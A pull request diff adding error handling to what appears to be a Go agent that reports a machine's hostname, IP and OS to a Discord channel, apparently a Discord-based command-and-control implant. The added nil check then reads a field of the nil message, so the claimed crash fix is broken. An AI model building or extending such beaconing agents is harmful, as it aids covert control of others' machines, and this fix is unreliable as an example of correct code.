### PR TITLE
added error handling to inital ChanelMessageSend

### DIFF
--- a/cmd/agent/main.go
+++ b/cmd/agent/main.go
@@ -61,6 +61,12 @@ func main() {
 
 	sendMessage := "``` Hostname: " + newAgent.HostName + "\n IP:" + newAgent.IP + "\n OS:" + newAgent.OS + "```"
 	message, _ := dg.ChannelMessageSend(channelID.ID, sendMessage)
+	//Handle if message is empty and/or bot doesn't have read permission
+	if message == nil {
+		fmt.Println("Message is empty! Check to see if Discord bot has proper channel read permissions!")
+		dg.ChannelMessageSend(message.ChannelID, "Message is empty! Check to see if Discord bot has proper channel read permissions!")
+		return
+	}
 	dg.ChannelMessagePin(channelID.ID, message.ID)
 	dg.AddHandler(messageCreater)
 


### PR DESCRIPTION
Discovered that there was an error not getting caught now that discord forces bots to have permissions to view certain messages. This should prevent the bot from not crashing anymore, making it functional <3